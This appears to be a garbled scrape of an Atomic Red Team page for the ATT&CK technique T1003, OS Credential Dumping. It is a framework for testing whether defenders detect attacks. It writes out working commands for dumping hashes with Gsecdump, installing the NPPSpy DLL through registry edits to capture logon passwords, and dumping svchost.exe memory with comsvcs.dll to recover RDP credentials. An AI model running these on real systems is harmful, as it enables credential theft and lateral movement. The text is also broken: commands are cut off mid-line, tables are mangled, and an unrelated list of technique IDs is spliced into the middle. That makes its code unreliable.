

## T1003 - OS Credential Dumping

### **Description from ATT&CK**

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement] (<a href="https://attack.mitre.org/tactics/TA0008">https://attack.mitre.org/tactics/TA0008</a>) and access restricted information. Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

#### **Atomic Tests**

- Atomic Test #1 Gsecdump
- Atomic Test #2 Credential Dumping with NPPSpy
- Atomic Test #3 Dump svchost.exe to gather RDP credentials

#### Atomic Test #1 - Gsecdump

Dump credentials from memory using Gsecdump.

Upon successful execution, you should see domain\username's followed by two 32 character hashes.

If you see output that says "compat: error: failed to create child process", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator)

If you see a message saying "The system cannot find the path specified", try using the get-prereq\_commands to download and install Gsecdump first.

Supported Platforms: Windows

auto\_generated\_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9

#### Inputs:

Name	Description	Type	
gsecdump_exe	Path to the Gsecdump executable	Path	PathToAtomicsFolder\T1003\bin\gsecdu

gsecdump_bin_hash	File hash of the Gsecdump binary file	String	94CAE63DCBABB71C5DD43F55	FD09C/			
gsecdump_url	Path to download Gsecdump binary file	Url	https://web.archive.org/web/201 v2b5.exe	506060			
Attack Commands: Run	with command	_prompt!	Elevation Required (e.g. root or a	admin)			
#{gsecdump_exe} -a				G			
Dependencies: Run wit	h nowershell						
Dependencies, kun wit	Dependencies: Run with powershell!						
Description: Gsecdump mu	Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})						
Check Prereq Commands:							
<pre>if (Test-Path #{gse</pre>	cdump_exe}) {	exit 0} e	lse {exit 1}	<del>-</del>			
Get Prereq Commands:							
atomic-red-team / atomics / 1	1003 / T1003.md	l		↑ Тор			
Preview Code Blame	175 lines (10	5 loc) · 6	.48 KB Raw	1 ★ :=			
Move-Item \$binpat							
}							
Atomic Test #2	- Credent	ial Dun	nping with NPPSpy				
7 teorine rest #2 Gredential Barriping With the repy							
•	nd creates Key for NPPSpy. After us by.txt. Clean up deletes the files and						
reverses Registry change			,				
https://github.com/gtwo	rek/PSBits/tree	/master/Pa	sswordStealing/NPPSpy				
Supported Platforms: V	Vindows						



# Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

auto\_generated\_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6

```
Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"

$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\N
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"

Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $Update $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy -Error $rv = New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\Netw $rv = New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPS $rv =
```

#### Cleanup Commands:

```
$cleanupPath = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Co
$cleanupUpdatedValue = $cleanupPath.PROVIDERORDER
$cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy',''
```

```
> T1021.001
  T1021.002
  T1021.003
 T1021.006
 T1027.001
 T1027.002
  T1027.004
  T1027
   T1030
  T1033
  T1036.003
  T1036.004
  T1036.005
 T1036.006
   T1036
  T1037.001
  T1037.002
  T1037.004
```

T1037.005

```
Set-ItemProperty -Path $cleanupPath.PSPath -Name "PROVIDERORDER" -Value Remove-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy" -Recuremove-Item C:\NPPSpy.txt -ErrorAction Ignore

Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
```

#### Dependencies: Run with powershell!

Description: NPPSpy.dll must be available in local temp directory

**Check Prereq Commands:** 

```
if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
```

#### **Get Prereq Commands:**

# Atomic Test #3 - Dump svchost.exe to gather RDP credentials

The svchost.exe contains the RDP plain-text credentials. Source: <a href="https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/">https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/</a>

Upon successful execution, you should see the following file created \$env:TEMP\svchost-exe.dmp.

**Supported Platforms:** Windows

auto\_generated\_guid: d400090a-d8ca-4be0-982e-c70598a23de9

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

```
$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAct
if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0]
C:\Windows\System32\rundl132.exe C:\windows\System32\comsvcs.dll, MiniDu
```

#### Cleanup Commands:

```
Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore
```